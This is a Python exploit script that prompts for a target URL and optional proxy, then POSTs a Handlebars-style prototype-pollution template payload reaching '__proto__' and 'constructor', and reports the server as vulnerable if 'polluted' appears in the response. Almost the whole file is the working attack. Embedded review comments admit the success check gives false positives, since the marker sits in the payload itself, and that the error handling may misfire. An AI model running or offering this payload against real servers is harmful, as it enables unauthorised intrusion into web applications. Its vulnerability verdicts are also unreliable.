import requests
import json
import logging

# Root-logger setup: INFO and above, rendered as "LEVEL: message".
logging.basicConfig(format='%(levelname)s: %(message)s', level=logging.INFO)

def exploit(url: str, proxy: str | None = None, timeout: int = 10) -> None:
    """Send one prototype-pollution probe to *url* and log whether it appears to have worked.

    The request is a JSON POST whose ``template`` field holds a Handlebars-style
    ``#with`` block that reaches ``constructor`` via ``__proto__``; the exact
    CVE this PoC belongs to is not stated on the page. The outcome is reported
    only through ``logging`` -- the function returns nothing and swallows
    network errors after logging them.

    Args:
        url: Endpoint that receives the JSON body.
        proxy: Optional proxy URL, applied to both ``http`` and ``https``.
        timeout: Per-request timeout in seconds, passed straight to ``requests.post``.

    Returns:
        None. "Vulnerable" is decided by a substring match on the response;
        see the review notes in the body about false positives.
    """
    # Payload to exploit Prototype Pollution.
    # NOTE(review): the marker 'polluted' that the checks below look for is
    # part of this template text, so any server that echoes the submitted
    # template back will match even if nothing was polluted.
    payload = {
        "template": "{{#with __proto__}}{{#with constructor}}{{defineProperty 'polluted' this}}{{/with}}{{/with}}"
    }

    headers = {
        'Content-Type': 'application/json',
        # Static desktop-browser User-Agent; the page gives no reason it is required.
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'
    }
    
    # Same proxy for both schemes; None means requests uses its defaults.
    proxies = None
    if proxy:
        proxies = {
            'http': proxy,
            'https': proxy
        }
    
    try:
        logging.info(f"Sending exploit to {url}...")
        if proxies:
            logging.info(f"Using proxy: {proxies}")
        # Body is serialized by hand; requests' json= parameter would set the same header.
        response = requests.post(url, data=json.dumps(payload), headers=headers, proxies=proxies, timeout=timeout)

        if response.status_code == 200:
            # "Executed" here only means the server answered 200, not that pollution happened.
            logging.info("Exploit executed successfully.")
            # Try to parse as JSON for more accurate detection
            try:
                resp_json = response.json()
                # str() of the parsed object is searched, so the marker can sit in any key or value.
                if 'polluted' in str(resp_json):  # Check for pollution indicator
                    logging.warning("The server is vulnerable to prototype pollution!")
                else:
                    logging.info("Server responded, but exploit did not seem to work.")
            # NOTE(review): Response.json() raises requests.exceptions.JSONDecodeError,
            # which subclasses json.JSONDecodeError only when simplejson is not
            # installed; otherwise it falls through to the outer RequestException
            # handler -- confirm, or catch ValueError here.
            except json.JSONDecodeError:
                # Fallback to text if not JSON
                if 'polluted' in response.text:
                    logging.warning("The server is vulnerable to prototype pollution!")
                else:
                    logging.info("Server responded, but exploit did not seem to work.")
        else:
            # Any non-200 status (including 4xx/5xx) is treated as a failed attempt.
            logging.error(f"Exploit failed with status code: {response.status_code}")
    except requests.RequestException as e:
        # Connection, timeout and proxy errors all land here; nothing is re-raised.
        logging.error(f"Error: {e}")
        if proxies:
            logging.error("Check if proxy is running and accessible.")

if __name__ == "__main__":
    # Interactive entry point: prompt for the target, an optional proxy and a timeout.
    target_url = input("Enter the target URL: ")
    # An empty (or whitespace-only) proxy answer means "no proxy".
    proxy = input("Enter proxy URL (leave blank if none): ").strip() or None
    timeout_input = input("Enter timeout in seconds (default 10): ").strip()
    # Anything that is not a plain non-negative integer keeps the 10 s default.
    timeout = 10
    if timeout_input.isdigit():
        timeout = int(timeout_input)
    exploit(target_url, proxy, timeout)